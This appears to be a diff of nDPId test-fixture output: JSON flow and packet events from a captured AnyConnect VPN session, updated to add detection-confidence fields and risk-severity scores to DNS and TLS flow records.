+00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687255989,"flow_last_seen":1569687256018,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":70,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1569687256018,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.76.76","src_port":58155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Slack","breed":"Acceptable","category":"Collaborative"},"dns": {"query":"slack.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"99.86.34.156"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687256018,"flow_last_seen":1569687256018,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569687256018,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1569687256018,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569687256018,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGqeMKAADjY1YinN5YAbvhhxKGAAAAALAC\/\/8SKwAAAgQFtAEDAwUBAQgKHA2jzgAAAAAEAgAA"}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1569687256050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1569687256050,"pkt":"NDY7z3UoLH6BsEqhCABFAAA8AABAAO4G++ZjViKcCgAA4wG73lg6Ai8I4YcSh6AScSDdlgAAAgQFtAQCCApVvxWbHA2jzgEDAwg="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1569687256050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569687256050,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGqe8KAADjY1YinN5YAbvhhxKHOgIvCYAQEBVtUAAAAQEIChwNo+1VvxWb"}
-00823{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687256018,"flow_last_seen":1569687256050,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569687256050,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00877{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687256018,"flow_last_seen":1569687256093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"ts_msec":1569687256093,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
+00849{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":132,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687256018,"flow_last_seen":1569687256050,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569687256050,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00903{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":134,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687256018,"flow_last_seen":1569687256093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":110,"midstream":0,"ts_msec":1569687256093,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"99.86.34.156","src_port":56920,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Slack","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"slack.com","ja3":"d8dc5f8940df366b3a58b935569143e8","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}}
 00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1569687259269,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":154,"pkt_l4_len":120,"ts_msec":1569687259269,"pkt":"AQBeAAD7GIEORo7ICABFAACMyOAAAP8RBrAKAADV4AAA+xTpFOkAeGDGAAAAAAADAAAAAAABD19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMgAEIX2hvbWVraXTAHAAMgAEMX3NsZWVwLXByb3h5BF91ZHDAIQAMgAEAACkFoAAAEZQAEgAEAA4AmzqBDkaOyBiBDkaOyA=="}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1569687259270,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":174,"pkt_l4_len":120,"ts_msec":1569687259270,"pkt":"MzMAAAD7GIEORo7Iht1gBoi5AHgR\/\/6AAAAAAAAABAg+RTq8FVL\/AgAAAAAAAAAAAAAAAAD7FOkU6QB4u7wAAAAAAAMAAAAAAAEPX2NvbXBhbmlvbi1saW5rBF90Y3AFbG9jYWwAAAyAAQhfaG9tZWtpdMAcAAyAAQxfc2xlZXAtcHJveHkEX3VkcMAhAAyAAQAAKQWgAAARlAASAAQADgCbOoEORo7IGIEORo7I"}
 00749{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1569687259297,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"ts_msec":1569687259297,"pkt":"GIEORo7INDY7z3UoCABFAAEEsFAAAP8R9OAKAADjCgAA1RTpFOkA8ADKAACEAAAAAAEAAAAED19jb21wYW5pb24tbGluawRfdGNwBWxvY2FsAAAMAAEAABGUABQRTFAtUktFUlVSLU9TWCAoOSnADMAyACGAAQAAAHgADQAAAADbaQRuRFBJwCHAMgAQgAEAABGUACIWcnBCQT0zNzoyRTo0Nzo2RDoxODo1NApycFZyPTE1Mi4xEUxQLVJLRVJVUi1PU1ggKDkpDF9kZXZpY2UtaW5mb8AcABAAAQAAEZQAIBRtb2RlbD1NYWNCb29rUHJvMTEsMQpvc3h2ZXJzPTE3wFgAAYABAAAAeAAECgAA4w=="}
@@ -132,40 +132,40 @@
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":181,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1569687260591,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569687260591,"pkt":"LH6BsEqhNDY7z3UoCABFAABAAABAAEAGxu4KAADjCCVgwt5ZEL8UzEFoAAAAALAC\/\/+sRwAAAgQFtAEDAwUBAQgKHA21kQAAAAAEAgAA"}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1569687260620,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569687260620,"pkt":"NDY7z3UoLH6BsEqhCABFAABAE+xAAPEGAgIIJWDCCgAA4xC\/3lkWZHs7FMxBabASECzSsgAAAgQFZAEDAwIBAQgKeKa\/ZBwNtZEEAgAA"}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1569687260620,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569687260620,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGxvoKAADjCCVgwt5ZEL8UzEFpFmR7PIAQEAgSNwAAAQEIChwNta14pr9k"}
-00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260591,"flow_last_seen":1569687260620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1569687260620,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01202{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687260591,"flow_last_seen":1569687260667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1308,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":242,"midstream":0,"ts_msec":1569687260667,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","6":"Self-signed Certificate","15":"TLS (probably) not carrying HTTPS","24":"SNI TLS extension was missing"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"e54965894d6b45ecb4323c7ea3d6c115","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","subjectDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","fingerprint":"86:2A:47:EF:00:68:79:60:7F:94:E2:91:6F:E0:38:82:37:8A:8E:2E"}}
+01173{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":184,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569687260591,"flow_last_seen":1569687260620,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1569687260620,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01552{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569687260591,"flow_last_seen":1569687260667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1308,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":242,"midstream":0,"ts_msec":1569687260667,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"8.37.96.194","src_port":56921,"dst_port":4287,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"e3adec914f3893f18136762f1c0d7d81","ja3s":"e54965894d6b45ecb4323c7ea3d6c115","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","subjectDN":"CN=813845657003339838, O=Code42, OU=TEST, ST=MN, C=US","fingerprint":"86:2A:47:EF:00:68:79:60:7F:94:E2:91:6F:E0:38:82:37:8A:8E:2E"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":196,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1569687260751,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"ts_msec":1569687260751,"pkt":"LH6BsEqhNDY7z3UoCABFAABXLuMAAP8R6zkKAADjS0tLS\/3MADUAQ49kJ8YBAAABAAAAAAAAAmxiB19kbnMtc2QEX3VkcAEwAzEyOAIyOAMxNzIHaW4tYWRkcgRhcnBhAAAMAAE="}
-00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.128.28.172.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":196,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":59,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.128.28.172.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":197,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1569687260751,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"ts_msec":1569687260751,"pkt":"LH6BsEqhNDY7z3UoCABFAABT7b0AAP8RLGMKAADjS0tLS\/CtADUAP6A2wl8BAAABAAAAAAAAAmxiB19kbnMtc2QEX3VkcAEwATABMAIxMAdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61613,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.0.0.10.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":197,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687260751,"flow_last_seen":1569687260751,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1569687260751,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.0.0.10.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1569687260767,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"ts_msec":1569687260767,"pkt":"NDY7z3UoLH6BsEqhCABFAABXAABAADoRnx1LS0tLCgAA4wA1\/cwAQw7hJ8aBgwABAAAAAAAAAmxiB19kbnMtc2QEX3VkcAEwAzEyOAIyOAMxNzIHaW4tYWRkcgRhcnBhAAAMAAE="}
-00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":198,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260767,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1569687260767,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.128.28.172.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":198,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260767,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1569687260767,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":64972,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.128.28.172.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1569687260772,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"ts_msec":1569687260772,"pkt":"NDY7z3UoLH6BsEqhCABFAABTAABAADoRnyFLS0tLCgAA4wA18K0APx+zwl+BgwABAAAAAAAAAmxiB19kbnMtc2QEX3VkcAEwATABMAIxMAdpbi1hZGRyBGFycGEAAAwAAQ=="}
-00771{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":199,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260772,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1569687260772,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61613,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.0.0.10.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":199,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569687260751,"flow_last_seen":1569687260772,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1569687260772,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":61613,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"lb._dns-sd._udp.0.0.0.10.in-addr.arpa","num_queries":1,"num_answers":0,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687261034,"flow_last_seen":1569687261034,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1569687261034,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"75.75.75.75","src_port":57261,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1569687261034,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"ts_msec":1569687261034,"pkt":"LH6BsEqhNDY7z3UoCABFAABPSYUAAP8R0J8KAADjS0tLS9+tADUAOxFSxpgBAAABAAAAAAAADnZjYWNyYXNocGxhbjAxAmhxBGNvcnAGdmlhc2F0A2NvbQAAAQAB"}
